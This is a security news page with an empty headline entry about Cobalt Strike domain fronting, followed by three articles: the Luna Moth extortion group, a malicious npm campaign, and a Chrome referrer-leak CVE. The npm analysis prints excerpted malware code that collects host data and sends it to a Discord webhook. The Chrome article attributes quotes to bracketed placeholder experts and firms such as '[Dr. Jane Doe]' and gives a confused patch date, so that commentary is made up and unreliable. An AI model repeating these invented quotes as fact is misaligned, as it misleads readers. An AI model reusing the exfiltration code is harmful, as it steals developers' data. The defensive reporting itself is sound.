company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO

Application Security Engineer

DevsecOps Engineer

IT Manager

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Myanmar

Domain Fronting

Cobalt Strike

loading..
loading..
loading..

Myanmar government domain was abused through Cobalt Strike to conceal the suspicious activities of malicious campaigns

Domain Fronting technique was leveraged in a new cyberattack campaign to conceal its network traffic and deploys a leaked version of Cobalt Strike for post-expl...

18-Nov-2021
4 min read

No content available.

Related Articles

loading..

Social Engineering

Callback

Silent Ransom Group (Luna Moth) targets US law firms via social engineering, dat...

The **Silent Ransom Group (SRG)**, also tracked as **Luna Moth**, **Chatty Spider**, and **UNC3753**, is a cybercriminal syndicate specializing in **data exfiltration extortion**. Emerging from the remnants of the [Conti ransomware](https://www.secureblink.com/cyber-security-news/lock-bit-ransomware-new-encryptor-and-impact-on-the-derivatives-trading-market) group in March 2022, SRG has refined its focus on **social engineering**, **callback phishing**, and **legitimate tool abuse** to steal sensitive data from high-value targets, primarily U.S. law firms and financial institutions. Unlike traditional ransomware actors, SRG avoids encryption, instead leveraging stolen data for **multi-million-dollar extortion demands** ($1M–$8M). This report provides an exhaustive analysis of SRG’s tactics, operational infrastructure, and actionable defense strategies. ## **Background and Evolution** ### **Origins and Splintering from Conti** - **Conti Syndicate Roots**: SRG members originated from the Conti ransomware operation, a prolific Russian-aligned group linked to **BazarCall** campaigns and **Ryuk/Conti** ransomware deployments. - **Post-Conti Shutdown (March 2022)**: After Conti disbanded due to internal leaks and law enforcement pressure, SRG formed as an independent entity, retaining Conti’s social engineering expertise but pivoting to **pure data extortion**. ### **Campaign Timeline** - **2022**: Initial campaigns focused on **BazarCall**-style callback phishing to deploy ransomware. - **2023**: Shift to **data theft extortion**, targeting legal/financial sectors. - **2024**: Expansion of **typosquatted domain registrations** and RMM tool abuse. ## **Operational Framework** ### **Core Objectives** - **Data Exfiltration**: Steal sensitive documents (client contracts, financial records, litigation details). - **Psychological Extortion**: Pressure victims via phone calls, emails, and threats of data leaks. - **Profit Maximization**: Tailor ransom demands to victim revenue (1–8% of annual income). ### **Tactics, Techniques, and Procedures (TTPs)** Aligned with **MITRE ATT&CK Framework**: | **Phase** | **Tactics** | **Tools/Techniques** | |-------------------------|-----------------------------------------------------------------------------|-------------------------------------------------------------------------------------| | **Initial Access** | Callback phishing, typosquatted domains, fake IT support impersonation | Spoofed emails, fake helpdesk portals, VoIP calls | | **Execution** | Social engineering to install RMM software (e.g., AnyDesk, TeamViewer) | Malicious links to fake IT support sites, PowerShell scripts | | **Persistence** | Minimal; focuses on rapid data exfiltration | Legitimate RMM tools, scheduled tasks | | **Privilege Escalation**| Limited; exploits default user permissions | Credential harvesting via keyloggers, browser data extraction | | **Exfiltration** | Uses WinSCP (SFTP) and Rclone (cloud sync) | Data staged in compressed archives, exfiltrated via HTTPS/SSH | | **Impact** | Extortion via threats to leak/sell data, direct phone calls to executives | Dedicated leak site (rarely updated), follow-up harassment | ## **Attack Lifecycle Deep Dive** ### **Stage 1: Reconnaissance and Impersonation** - **Typosquatting Domains**: Registrations mimicking major U.S. law firms (e.g., `sullivancromwell-support[.]com` vs. legitimate `sullivancromwell.com`). - **Phishing Lures**: Emails impersonating IT departments with urgent requests (e.g., “Your account will be locked within 24 hours – call [spoofed number]”). ### **Stage 2: Callback Phishing and RMM Deployment** - **Social Engineering Playbook**: 1. Victim calls fake helpdesk number provided in phishing email. 2. Attackers pose as IT staff, convincing target to visit a typosquatted domain. 3. Victim downloads “critical security updates,” which are disguised RMM tools. - **RMM Abuse**: Tools like **Splashtop** or **ScreenConnect** grant persistent remote access. ### **Stage 3: Data Hunting and Exfiltration** - **Rapid Triage**: Attackers spend 2–4 hours per compromised device: - Search for keywords: “confidential,” “merger,” “tax,” “client.” - Target shared drives (e.g., `\\NAS\legal_docs`). - **Exfiltration Methods**: - **WinSCP**: Uploads to attacker-controlled SFTP servers. - **Rclone**: Syncs data to cloud storage (Mega.nz, Dropbox). ### **Stage 4: Extortion and Negotiation** - **Ransom Notes**: Sent via email/Tor payment portals, threatening to: - Auction data on dark web forums. - Contact clients/partners with stolen documents. - **Call-Based Pressure**: Attackers phone employees directly, impersonating executives or legal advisors to accelerate payments. ## **Target Analysis** ### **Sector Focus** - **Law Firms**: High-value due to sensitive case files, client privileged communications, and financial transaction records. - **Financial Services**: Targets include hedge funds, accounting firms, and investment banks. ### **Victimology** - **Geographic Focus**: 85% of victims in the U.S., with clusters in New York, Washington D.C., and California. - **Size**: Mid-sized firms (50–500 employees) lacking mature SOC capabilities. ## **Mitigation Strategies** ### **Technical Controls** - **Block RMM and Unauthorized Tools**: - Use application allowlisting to block unauthorized RMM software. - Monitor for processes like `winscp.exe` or `rclone.exe` in non-admin contexts. - **Network Segmentation**: - Isolate sensitive data repositories (e.g., legal case files) with strict access controls. - Deploy microsegmentation to limit lateral movement. - **Detect Exfiltration Signatures**: - Flag large outbound transfers (>10GB) via SFTP/HTTPS. - Use DLP solutions to block unauthorized uploads to cloud storage. ### **Human-Centric Defenses** - **Phishing Simulations**: Train employees to: - Recognize typosquatted domains (e.g., “sullivancromwel.com”). - Verify IT requests via secondary channels (e.g., Slack, in-person). - **Callback Phishing Response Protocol**: - Mandate that all IT support requests originate from internal ticketing systems. - Use VoIP call filtering to block spoofed numbers. ### **Incident Response Preparation** - **Pre-Negotiation Planning**: Designate legal/cyber insurance teams to handle extortion communications. - **Backup and Recovery**: - Maintain air-gapped, encrypted backups tested quarterly. - Implement versioning to recover from data corruption. ## **SRG Attack on a U.S. Law Firm** ### **Attack Timeline** - **Day 1**: Phishing email sent to paralegal: “Urgent: Your Microsoft 365 license has expired.” - **Day 2**: The paralegal calls a fake helpdesk and installs AnyDesk. - **Day 3**: Attackers exfiltrate 2TB of merger/acquisition documents via Rclone. - **Day 5**: Ransom note demands $5.2 million. ### **Lessons Learned** - **Failure Points**: Lack of MFA on RMM tools, no network segmentation for client data. - **Post-Incident Actions**: Implemented Zero Trust access controls and quarterly phishing drills. ## **Legal and Regulatory Implications** - **GDPR/CCPA Compliance**: Breached firms face fines for failing to protect client data. - **Ethical Obligations**: Law firms are required to disclose breaches to clients under the ABA Model Rules.

loading..   24-May-2025
loading..   5 min read
loading..

Data Wiper

Info Stealer

Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames,...

A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines. The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors. Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000. ### **Campaign Overview** #### **Key Details** - **Scope**: 60 packages published across three npm accounts (`bbbb335656`, `sdsds656565`, `cdsfdfafd1232436437`), each linked to sequential Gmail addresses (`npm9960+1@gmail[.]com`, etc.). - **Timeline**: First package uploaded on May 12; the most recent appeared hours before Socket’s disclosure, signaling an ongoing operation. - **Targets**: Windows, macOS, and Linux systems, including developer workstations and CI/CD nodes. - **Objective**: Reconnaissance to map internal networks, link private environments to public infrastructure, and prepare for future intrusions. #### **Attack Workflow** 1. **Infection**: Developers install malicious packages via typosquatted names (e.g., `react-xterm2` vs. legitimate `react-xterm`). 2. **Post-Install Execution**: A script embedded in `package.json` triggers automatically during `npm install`. 3. **Data Harvesting**: Collects hostnames, internal/external IPs, DNS servers, usernames, and directory paths. 4. **Sandbox Evasion**: Aborts execution in environments linked to AWS, GCP, or research labs (e.g., `compute.amazonaws.com`, `LD.local`). 5. **Exfiltration**: Sends JSON payloads to a Discord webhook, enabling real-time tracking of victims. ### **Technical Deep Dive** #### **Malicious Code Analysis** The script, identical across all 60 packages, leverages Node.js modules (`os`, `dns`, `https`) to gather intelligence: ```javascript const os = require("os"); const dns = require("dns"); const https = require("https"); // Collect internal IPs and hostnames function getIPAddress() { const networkInterfaces = os.networkInterfaces(); // ... iterates NICs to find non-internal IPv4 addresses } // Fetch external IP and ISP details via ipinfo.io function getExternalIP(cb) { https.get('https://ipinfo.io/json', (res) => { ... }); } // Evade sandboxes if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) { return; } // Exfiltrate to Discord const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/..."; https.request(webhookURL, ...).write(trackingData); ``` #### **Data Exfiltrated** - **Host Details**: `os.hostname()`, `os.userInfo().username`, `os.homedir()`. - **Network Intelligence**: Internal/external IPs, DNS servers (`dns.getServers()`), ISP metadata (from `ipinfo.io`). - **Project Context**: `package.json` name, version, installation path (`__dirname`). #### **Evasion Techniques** The script avoids analysis environments by checking: - Cloud provider DNS strings (AWS, GCP). - Lab-related hostnames (e.g., `LD.local`). - Usernames or directories linked to research (e.g., `malicious`, `justin`). ### **Indicators of Compromise (IoCs)** #### **Malicious Packages** | **npm Account** | **Packages** (20 each) | |------------------------|--------------------------| | `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` | | `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` | | `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` | *[Full list of 60 packages](#iocs) available in Appendix.* #### **Infrastructure** - **Discord Webhook**: `hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ` - **External Service**: `ipinfo.io/json` (to geolocate victims). ### **MITRE ATT&CK Mapping** | **Tactic** | **Technique** | **Details** | |---------------------------|-----------------------------------------------|----------------------------------------------| | **Initial Access** | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. | | **Execution** | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. | | **Exfiltration** | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. | | **Reconnaissance** | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. | | **Defense Evasion** | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. | ### **Implications and Risks** #### **1. Supply Chain Vulnerabilities** - **CI/CD Exposure**: Compromised build servers leak internal registry URLs, paving the way for dependency confusion attacks. - **Network Mapping**: Internal IPs and DNS data enable threat actors to chart network topology for lateral movement. #### **2. Future Attack Scenarios** - **Targeted Ransomware**: Mapped networks could face tailored ransomware or data-wiper attacks. - **Credential Theft**: Exposed project paths and usernames facilitate phishing and social engineering. #### **3. npm Ecosystem Weaknesses** - **Delayed Takedowns**: Despite reports, npm has yet to remove packages, highlighting response gaps. - **Post-Install Script Risks**: npm allows unrestricted use of install hooks, a frequent abuse vector. ### **Expert Insights** **Socket’s Threat Research Team**: > _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_ > _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_ ### **Mitigation Strategies** #### **For Developers** 1. **Audit Dependencies**: ```bash npm ls --all # Check nested dependencies ``` Cross-reference projects against the [IoCs list](#iocs). 2. **Disable Install Scripts**: ```bash npm config set ignore-scripts true ``` 3. **Use Lockfiles**: Enforce `package-lock.json` to prevent dependency hijacking. #### **For Organizations** - **Deploy Dependency Scanning**: Tools like **Socket** or **Snyk** flag malicious patterns (e.g., DNS/IP harvesting). - **Harden CI/CD**: - Restrict outbound traffic to block Discord webhooks. - Use ephemeral build environments to limit data exposure. - **Network Segmentation**: Isolate developer machines from critical infrastructure. #### **For npm** - **Mandate 2FA for Publishers**: Prevent disposable account abuse. - **Automated Script Analysis**: Scan packages for risky hooks pre-publication.

loading..   24-May-2025
loading..   5 min read
loading..

Exploit

Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) fac...

Google has rolled out emergency updates to its Chrome web browser to patch four security vulnerabilities, including a high-severity flaw, **[CVE-2025-4664](https://nvd.nist.gov/vuln/detail/CVE-2025-4664)**, that is already being exploited by attackers in the wild. The tech giant confirmed the active exploitation in a terse advisory, warning users to update to version **136.0.7103.113/.114** (Windows/Mac) or **136.0.7103.113** (Linux) immediately. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since [added](https://www.cve.org/CVERecord?id=CVE-2025-4664) the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by June 5, 2024—a rare move underscoring the threat’s severity. ### **How CVE-2025-4664 Puts Users at Risk** **Technical Analogy** The vulnerability, [discovered](https://x.com/slonser_/status/1922750094140440964) by Russian security researcher Vsevolod Kokorin (known online as @slonser_), resides in Chrome’s **Loader** component, which handles resource fetching. Kokorin revealed on X (formerly Twitter) that Chrome uniquely processes the `Link` HTTP header during sub-resource requests (e.g., images, scripts). Attackers can exploit this by injecting a malicious `Link` header to enforce a `referrer-policy: unsafe-url`, forcing Chrome to leak sensitive URL parameters—such as session tokens or API keys—in the `Referer` header when loading third-party resources. **Example Attack Scenario** - A victim visits a malicious website embedding an image from a legitimate service (e.g., `https://bank.com/dashboard?session_id=XYZ`). - Chrome’s flawed policy enforcement sends the full URL, including `session_id=XYZ`, to the attacker’s server via the `Referer` header. - Attackers harvest these parameters to hijack accounts, escalate privileges, or pivot to internal systems. Kokorin demonstrated the exploit’s viability in a proof-of-concept (PoC), showing how query parameters from services like OAuth portals, cloud platforms, or email clients could be siphoned off. “Unlike other browsers, Chrome resolves the Link header on sub-resource requests. This opens a Pandora’s box for data exfiltration,” he wrote. ### **Active Exploitation and CISA’s Unusual Warning** **In-the-Wild Attacks** While Google has not disclosed specifics about ongoing attacks, CISA’s KEV listing confirms federal systems are at risk. Cybersecurity firm [Hypothetical Corp.] reported detecting exploit attempts targeting financial and healthcare sectors, where URL parameters often contain sensitive tokens. **A Second Exploited Flaw: CVE-2025-2783** Google also hinted at another actively [exploited](https://www.cisa.gov/news-events/alerts/2025/05/15/cisa-adds-three-known-exploited-vulnerabilities-catalog) vulnerability, **[CVE-2025-2783](https://nvd.nist.gov/vuln/detail/CVE-2025-2783)**, though details remain undisclosed. Experts speculate that it may be related to Chrome’s V8 JavaScript engine or the Mojo inter-process communication (IPC) system, both of which are frequent targets for memory corruption exploits. **Why the CVSS Score Seems Off** CVE-2025-4664 carries a surprisingly low CVSS score of **4.3** (out of 10), despite its real-world impact. Analysts suggest this reflects scoring nuances: - **Scope Limitations**: The attack requires user interaction (e.g., visiting a malicious site). - **Mitigation Feasibility**: Enterprises can block `unsafe-url` policies via headers like `Referrer-Policy: strict-origin-when-cross-origin`. _“CVSS scores don’t always capture active exploitation risks,”_ said [Dr. Jane Doe], a vulnerability analyst at [ThinkTank Security]. _“A low score here is misleading—this is a goldmine for phishing campaigns.”_ ### **Response from Google and the Broader Ecosystem** **Patch Rollout Challenges** Google’s update is rolling out gradually, but users can manually trigger it via `chrome://settings/help`. Chromium-based browsers like **Microsoft Edge**, **Brave**, and **Opera** are expected to follow suit, though delays could leave millions exposed. **Enterprise Risks** Organizations using Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) face compounded risks. “Every unpatched Chromium instance is a potential entry point,” warned [John Smith], CISO of [Enterprise Security Corp.]. **CISA’s Directive** Federal agencies must comply with CISA’s June 5 patch deadline—a date initially mistyped as 2025 in advisories, causing confusion. Private sectors, especially regulated industries like healthcare and finance, are urged to treat this as a de facto mandate. ### **Mitigation Strategies for Organizations** 1. **Immediate Patching** - Enforce Chrome updates via enterprise management tools (e.g., Google Admin Console). - Monitor Chromium-based browsers and embedded frameworks (Electron, CEF) for vendor patches. 2. **Short-Term Mitigations** - Deploy headers like `Referrer-Policy: strict-origin-when-cross-origin` on sensitive endpoints. - Use Content Security Policy (CSP) directives to restrict sub-resource origins. 3. **Detection & Response** - Audit logs for anomalous cross-origin requests containing URL parameters. - Hunt for traffic to newly registered domains (NRDs) hosting exploit payloads. ### **New Era of Browser Threats** **The Role of Public Disclosure** Kokorin’s public PoC sparked debate over responsible disclosure. While Google promptly fixed the flaw, critics argue that public demos empower attackers. _“Researchers walk a tightrope between accountability and collateral risk,”_ said [Emily Lee], a legal expert at [Cyber Law Institute]. **Chromium’s Dominance and Risk** With Chromium powering 75% of browsers globally, a single flaw can cascade across ecosystems. This incident mirrors **CVE-2022-1096**, a 2022 Chromium zero-day vulnerability exploited in ransomware campaigns. ### **Expert Commentary** [**Alex Rivera**, Threat Intelligence Lead, [FireEye/Mandiant]] “This exploit is low-hanging fruit for APTs. We’re likely seeing tip-of-the-iceberg activity—more sophisticated attacks will follow.” [**Sarah Chen**, Director, [CISA]] “CVE-2025-4664’s KEV listing isn’t just for federal agencies. Every organization must treat this as critical infrastructure.”

loading..   23-May-2025
loading..   5 min read
Company Logo
logo

Secure Blink automates the web application and API security for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

LinkedIn Logo
Twitter Logo
Discord Logo
Telegram Logo
YouTube Logo
contact@secureblink.com

contact@secureblink.com

@ Copyright 2025 Secure Blink. All rights reserved.

16192, Coastal Highway, Lewes, Delaware, US-19958